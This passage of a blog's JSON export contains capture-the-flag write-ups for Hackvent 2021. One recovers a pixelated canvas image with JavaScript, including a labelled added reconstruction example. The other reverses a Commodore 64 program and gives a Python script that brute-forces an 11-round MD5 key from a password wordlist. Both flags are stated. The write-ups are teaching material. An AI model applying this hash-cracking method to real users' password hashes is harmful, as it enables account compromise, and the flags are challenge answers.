8,120,144,164,156,144,132,116,100,88,56,24,16,8,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,8,20,36,56,76,92,104,112,136,152,144,132,120,104,92,84,52,24,16,8,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,8,20,36,56,76,88,96,104,124,136,128,116,104,92,84,76,48,24,16,8,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,8,20,36,52,72,84,96,104,120,128,120,112,100,88,76,68,44,24,16,8,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,8,20,32,44,64,80,96,108,124,128,124,120,108,92,76,64,40,24,16,8,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,8,16,24,32,56,76,96,112,128,136,140,140,124,104,84,68,44,28,16,8,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,4,8,12,16,40,56,72,88,108,120,128,132,116,100,84,68,44,28,16,8,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,20,32,44,56,76,92,104,112,100,88,76,64,44,28,16,8,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,24,36,48,60,80,96,112,124,108,96,84,72,52,36,20,8,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,28,44,60,76,96,112,128,140,120,104,88,72,52,36,20,8,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,28,48,68,84,104,120,136,148,128,108,88,72,52,36,
20,8,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,28,44,60,76,96,112,128,140,120,104,88,72,52,36,20,8,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,24,36,48,60,76,92,108,124,108,96,84,72,56,40,24,8,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,4,8,8,28,36,44,52,64,72,80,100,92,84,76,68,56,44,32,12,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,4,12,16,16,32,40,48,52,56,56,60,80,76,68,60,56,48,40,32,12,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,8,20,24,24,40,48,60,64,64,56,56,76,72,64,52,48,40,36,32,12,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,12,28,32,32,44,56,72,76,68,52,48,64,68,56,40,36,32,32,32,16,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,16,36,44,44,56,68,84,88,72,52,44,64,72,60,44,40,40,40,40,20,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,20,44,56,60,72,84,100,108,92,72,64,84,96,84,68,60,56,52,48,24,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,20,48,64,72,84,96,116,128,116,96,88,108,120,108,88,76,68,60,52,24,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,20,48,64,72,84,96,116,132,124,108,100,116,128,116,96,80,68,56,48,24,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,20,44,56,64,76,88,108,124,116,104,100,1\n12,120,108,88,72,60,48,40,20,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,16,36,48,56,68,80,100,116,112,104,100,108,112,100,80,64,52,40,32,16,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,12,28,40,48,60,72,88,104,104,100,96,100,100,88,72,56,44,32,24,12,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,4,12,24,36,44,56,64,76,88,92,92,88,92,88,80,68,52,44,32,24,12,4,4,4,4,0,0,0,0,0,0,0,0,0,0,0,8,16,28,40,52,64,72,80,84,88,88,88,88,84,80,76,68,64,52,40,28,20,16,12,8,0,0,0,0,0,0,0,0,0,0,0,8,16,28,40,52,64,72,80,80,80,80,80,80,76,76,76,76,76,64,52,40,32,24,16,8,0,0,0,0,0,0,0,0,0,0,0,8,16,28,40,52,64,72,80,80,80,80,76,76,76,80,84,84,84,72,64,52,40,28,16,8,0,0,0,0,0,0,0,0,0,0,0,8,16,28,40,52,64,72,80,80,80,76,72,72,72,76,80,80,80,72,64,52,40,28,16,8,0,0,0,0,0,0,0,0,0,0,0,8,16,28,40,52,64,72,80,80,80,76,72,72,72,76,80,80,80,72,64,52,40,28,16,8,0,0,0,0,0,0,0,0,0,0,0,8,16,28,40,52,64,72,80,80,80,76,72,72,72,76,80,80,80,72,64,52,40,28,16,8,0,0,0,0,0,0,0,0,0,0,0,8,16,28,40,52,64,72,80,80,80,76,72,72,72,76,80,80,80,72,64,52,40,28,16,8,0,
0,0,0,0,0,0,0,0,0,0,4,12,24,36,48,60,68,76,80,80,76,72,72,72,76,80,80,76,68,60,48,36,24,12,4,0,0,0,0,0,0,0,0,0,0,0,0,4,12,20,28,36,40,48,56,60,60,56,56,56,60,60,56,48,40,36,28,20,12,4,0,0,0,0,0,0,0,0,0,0,0,0,0,0,4,8,12,16,16,20,28,36,36,32,32,32,36,36,28,20,16,16,12,8,4,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,4,8,8,8,8,8,8,8,4,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
,0,0,0,0];\n    let move = -320;\n    let moving = 0;\n    function printPixels() {\n        if (moving++ % 2 === 0) move++;\n        if (move>300) move =-320;\n        for (let i = 0; i &lt; 40; i++) {\n            for (let j = 0; j &lt; 9; j++) {\n                let x = (i*8+move);\n                let y = ((j-2)*8+(i-15));\n                let color = x>0&amp;&amp;y>0&amp;&amp;x&lt;300&amp;&amp;y&lt;36?digits[x*36+y]:0;\n                context.fillStyle = \"#\"+(\"000000\"+((color &lt;&lt; 16) | (color &lt;&lt; 8) | color).toString(16)).slice(-6);\n                context.fillRect(i * 40, j * 40, 40, 40);\n            }\n        }\n        requestAnimationFrame(printPixels);\n    }\n    printPixels();<\/pre>\n\n\n\n<p>I examined the code and played around with it in JSFiddle. The array contains 10800 items; if we divide it by 36, we get 300 rows. Thanks, ludus!<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"js\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">\/\/ Replaces the tail of the page script; canvas, context and digits are defined above.\nlet move = 0;\nlet moving = 0;\nconsole.log(digits.length); \/\/ 10800 = 300 * 36\nfunction printPixels() {\n  for (let x = 0; x &lt; 300; x++) {\n    for (let y = 0; y &lt; 36; y++) { \/\/ 36 values per x, matching the x*36+y index\n      let color = digits[x*36+y];\n      \/\/console.log(color)\n      \/\/ pad to six hex digits so that a value of 0 still yields a valid colour\n      context.fillStyle = \"#\" + (\"000000\" + ((color &lt;&lt; 16) | (color &lt;&lt; 8) | color).toString(16)).slice(-6);\n      context.fillRect(x*5, y*5, 5, 5); \/\/ one 5x5 square per array value\n    }\n  }\n  \/\/requestAnimationFrame(printPixels);\n}\nprintPixels(); \/\/ draw once, without the scrolling animation<\/pre>\n\n\n\n<p>If we alter the code as shown, we get an image that is a bit clearer, though still far from readable. 
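<\/p>

<p>The page script also explains why the low resolution channel hides nothing, even from someone who only watches the canvas: the 40x9 block grid slides across the source one pixel at a time, so the frames together sample almost every value. The following added example (not part of the original write-up or of the challenge code) replays the page's sampling rule over a constructed 300x36 image and rebuilds that image from the frames alone. The names makeSource, renderFrame, reconstruct and demo, and the pixel data, are assumptions made for this example.<\/p>

```javascript
// Added example: the geometry is taken from the page's script,
// the pixel data is constructed here and is not the challenge's array.
const W = 300, H = 36;      // source image: digits[x * 36 + y]
const COLS = 40, ROWS = 9;  // blocks drawn per frame by the page's nested loops

// Constructed stand-in for the page's digits array: deterministic grey values
// in 1..255 (never 0, so a recovered pixel cannot be mistaken for 'outside').
function makeSource(seed = 1) {
  const src = new Uint8Array(W * H);
  let s = seed >>> 0;
  for (let k = 0; k < src.length; k++) {
    s = (Math.imul(s, 1664525) + 1013904223) >>> 0; // simple LCG
    src[k] = 1 + (s >>> 24) % 255;
  }
  return src;
}

// The page's rule for which source pixel colours block (i, j) at offset move.
function sampleCoord(i, j, move) {
  return [i * 8 + move, (j - 2) * 8 + (i - 15)];
}

// Same bounds test as the page: x>0 && y>0 && x<300 && y<36.
const inside = (x, y) => x > 0 && y > 0 && x < W && y < H;

// What an observer of the canvas sees for one frame: 40 x 9 grey values.
function renderFrame(src, move) {
  const frame = [];
  for (let i = 0; i < COLS; i++) {
    frame.push([]);
    for (let j = 0; j < ROWS; j++) {
      const [x, y] = sampleCoord(i, j, move);
      frame[i].push(inside(x, y) ? src[x * H + y] : 0);
    }
  }
  return frame;
}

// Rebuild the source from observed frames only. The source array is never
// read here; only the sampling geometry is used, and that is public in the script.
function reconstruct(observeFrame) {
  const out = new Array(W * H).fill(null);
  for (let move = -320; move <= 300; move++) { // offsets the animation cycles through
    const frame = observeFrame(move);
    for (let i = 0; i < COLS; i++) {
      for (let j = 0; j < ROWS; j++) {
        const [x, y] = sampleCoord(i, j, move);
        if (inside(x, y)) out[x * H + y] = frame[i][j];
      }
    }
  }
  return out;
}

function demo() {
  const src = makeSource();
  const rebuilt = reconstruct((move) => renderFrame(src, move));
  let recovered = 0, wrong = 0;
  for (let k = 0; k < rebuilt.length; k++) {
    if (rebuilt[k] === null) continue;
    recovered++;
    if (rebuilt[k] !== src[k]) wrong++;
  }
  // Source pixels visible in one single frame (move = 0), for comparison.
  let perFrame = 0;
  for (let i = 0; i < COLS; i++) {
    for (let j = 0; j < ROWS; j++) {
      if (inside(...sampleCoord(i, j, 0))) perFrame++;
    }
  }
  return { total: W * H, recovered, wrong, perFrame };
}

console.log(demo());
```

<p>Only the values at x = 0 or y = 0, which the page's bounds test never draws, stay unknown: 10465 of the 10800 values come back, against at most 360 in any single frame. 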
<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"230\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/img_blurred-1024x230.png\" alt=\"\" class=\"wp-image-1863\" srcset=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/img_blurred-1024x230.png 1024w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/img_blurred-300x68.png 300w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/img_blurred-768x173.png 768w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/img_blurred-1536x346.png 1536w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/img_blurred.png 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>On this we can apply a <a rel=\"noreferrer noopener\" href=\"https:\/\/en.wikipedia.org\/wiki\/Motion_blur\" target=\"_blank\">motion blur filter<\/a> and make the image readable. I used an <a rel=\"noreferrer noopener\" href=\"https:\/\/play.google.com\/store\/apps\/details?id=mubeen.image.dehaze_enhancer&amp;hl=en&amp;gl=US\" target=\"_blank\">Android application<\/a> on my mobile phone to do so. I still had to guess some characters. 
The final result was this:<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"230\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/sol1-1024x230.png\" alt=\"\" class=\"wp-image-1864\" srcset=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/sol1-1024x230.png 1024w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/sol1-300x68.png 300w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/sol1-768x173.png 768w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/sol1-1536x346.png 1536w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/sol1.png 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">Flag<\/h2>\n\n\n\n<p>HV21{P1xeliz4t10n_N07_54v3}<\/p>\n\n\n\n<hr class=\"wp-block-separator has-css-opacity\"\/>\n\n\n\n<h1 class=\"wp-block-heading\">[HV21.24] Dusty Disk Disaster<\/h1>\n\n\n\n<figure class=\"wp-block-image size-full\"><img decoding=\"async\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-43-1.png\" alt=\"\" class=\"wp-image-1744\"\/><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">Thanks!<\/h2>\n\n\n\n<p>This challenge is brought to you by&nbsp;<em>darkstar<\/em>. Merry reversing!<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Introduction<\/h2>\n\n\n\n<p>It happened again: Santa misplaced some very important data. His elves came across an&nbsp;<a href=\"https:\/\/competition.hacking-lab.com\/api\/media\/challenge\/d64\/8e8f5260-8181-4187-9a24-a03d679d9d98.d64\" target=\"_blank\" rel=\"noreferrer noopener\">old dusty floppy disk<\/a>&nbsp;that they can unfortunately no longer read&#8230;<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Goal<\/h2>\n\n\n\n<p>Could you please check if there is something important on it?<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Solution<\/h2>\n\n\n\n<p>Wow, another amazing challenge from darkstar. We are provided with a d64 file, which is a Commodore 64 image. 
The hardest part of this challenge was setting up the environment to analyze and solve it. I used the <a rel=\"noreferrer noopener\" href=\"https:\/\/vice-emu.sourceforge.io\/\" target=\"_blank\">VICE emulator<\/a> and Ghidra to solve the challenge. In Ghidra I used an <a href=\"https:\/\/github.com\/zeroKilo\/C64LoaderWV\" target=\"_blank\" rel=\"noreferrer noopener\">additional plugin to work with d64 files<\/a>.<\/p>\n\n\n\n<p>Program Flow:<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"936\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-96-1024x936.png\" alt=\"\" class=\"wp-image-1869\" srcset=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-96-1024x936.png 1024w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-96-300x274.png 300w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-96-768x702.png 768w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-96.png 1442w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"937\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-97-1024x937.png\" alt=\"\" class=\"wp-image-1870\" srcset=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-97-1024x937.png 1024w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-97-300x275.png 300w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-97-768x703.png 768w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-97.png 1442w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"936\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-98-1024x936.png\" alt=\"\" class=\"wp-image-1871\" 
srcset=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-98-1024x936.png 1024w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-98-300x274.png 300w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-98-768x702.png 768w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-98.png 1440w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>We need to reverse engineer\/debug this application to get the right key to &#8220;free&#8221; the flag. After some time of scrolling through disassembled code in Ghidra I joined forces with ice and jokker. Once again we found constants in the disassembled code.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"740\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-99-1024x740.png\" alt=\"\" class=\"wp-image-1872\" srcset=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-99-1024x740.png 1024w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-99-300x217.png 300w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-99-768x555.png 768w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-99.png 1232w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<pre class=\"wp-block-preformatted\">A := 01234567₁₆\nB := 89ABCDEF₁₆\nC := FEDCBA98₁₆\nD := 76543210₁₆<\/pre>\n\n\n\n<p>In the <a href=\"https:\/\/datatracker.ietf.org\/doc\/html\/rfc1321\" target=\"_blank\" rel=\"noreferrer noopener\">RFC of MD5<\/a> we find this definition, which looks highly familiar!<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"273\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-100-1024x273.png\" alt=\"\" class=\"wp-image-1873\" srcset=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-100-1024x273.png 1024w, 
https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-100-300x80.png 300w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-100-768x205.png 768w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-100.png 1244w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Now we know that MD5 hashing is used and that the function FUN_2791 implements it. I started working with the debugger of VICE. First I set a breakpoint at the address 2791, which is the start of the MD5 function.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"830\" height=\"96\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/breakpoint.png\" alt=\"\" class=\"wp-image-1874\" srcset=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/breakpoint.png 830w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/breakpoint-300x35.png 300w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/breakpoint-768x89.png 768w\" sizes=\"auto, (max-width: 830px) 100vw, 830px\" \/><\/figure>\n\n\n\n<p>After setting the breakpoint I enter any key in the application and figure out that the MD5 function is called 11 times! 
I examine the memory of the application further and find the location of my input at cfa4:<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"315\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/memory_key-1024x315.png\" alt=\"\" class=\"wp-image-1875\" srcset=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/memory_key-1024x315.png 1024w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/memory_key-300x92.png 300w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/memory_key-768x236.png 768w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/memory_key-1536x472.png 1536w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/memory_key.png 1684w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>My lower-case input &#8220;xxxxx&#8221; is converted to upper case. At first I thought the application just transforms every input to upper case. Through a hint I discovered that Commodore stores its values in <a rel=\"noreferrer noopener\" href=\"https:\/\/en.wikipedia.org\/wiki\/PETSCII\" target=\"_blank\">PETSCII<\/a> and not ASCII. This will become relevant when we brute force the key.<\/p>\n\n\n\n<p>Next I found the location of the target hash and the hash of my input. 
These values are stored at cef4 and cf04:<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"96\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/memory_hash-1024x96.png\" alt=\"\" class=\"wp-image-1876\" srcset=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/memory_hash-1024x96.png 1024w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/memory_hash-300x28.png 300w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/memory_hash-768x72.png 768w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/memory_hash.png 1284w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Now we can verify whether our input, hashed 11 times with MD5, matches the data at cf04 in memory.<strong> And indeed it does!<\/strong> Together with the hint which was released on the challenge page (ask a human about the password), we now know to use the <a rel=\"noreferrer noopener\" href=\"https:\/\/crackstation.net\/crackstation-wordlist-password-cracking-dictionary.htm\" target=\"_blank\">wordlist human-only<\/a> to brute-force the right key. 
My final script to get the access key looks like this:<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"python\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">import hashlib\nimport sys\n\nimport cbmcodecs2  # importing it registers the PETSCII codecs used below\n\n# Target hash found in the memory of the C64 program\ntarget = \"b229f80b33fac1a464d6b1997ed66bd8\"\ntried = 0\n# Stream the wordlist line by line instead of loading it all at once\nwith open(\"human.txt\", \"r\", encoding='latin-1') as f:\n    for line in f:\n        line = line.rstrip()\n        try:\n            # The C64 stores the typed key as PETSCII, not ASCII\n            h = hashlib.md5(line.encode('petscii_c64en_lc')).digest()\n        except UnicodeError:\n            # Skip words with characters the PETSCII codec cannot encode\n            continue\n        # Ten more rounds: the program calls MD5 11 times in total\n        for i in range(10):\n            h = hashlib.md5(h).digest()\n            if h.hex() == target:\n                print(\"[+] Found match!\")\n                print(\"[> \" + line)\n                sys.exit(0)\n        tried += 1\n        # Progress output every 10000 candidates\n        if tried % 10000 == 0:\n            print(tried)<\/pre>\n\n\n\n<p>Running the Python script reveals the access key:<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img decoding=\"async\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-101-1.png\" alt=\"\" class=\"wp-image-1877\"\/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/key_accepted-1-1024x930.png\" alt=\"\" class=\"wp-image-1878\"\/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/flag-1-2-1024x918.png\" alt=\"\" class=\"wp-image-1879\"\/><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">Flag<\/h2>\n\n\n\n<p>HV21{C64_r3v3rs1ng}<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Hackvent 2021 is over! Once again, this year&#8217;s Hackvent was terrific &#8211; even though it was uncertain until the start whether it would take place at all. Eventually, the event was a traditional, full-blown Hackvent! 
Thanks to all challenge contributors &hellip;<\/p>\n","protected":false}}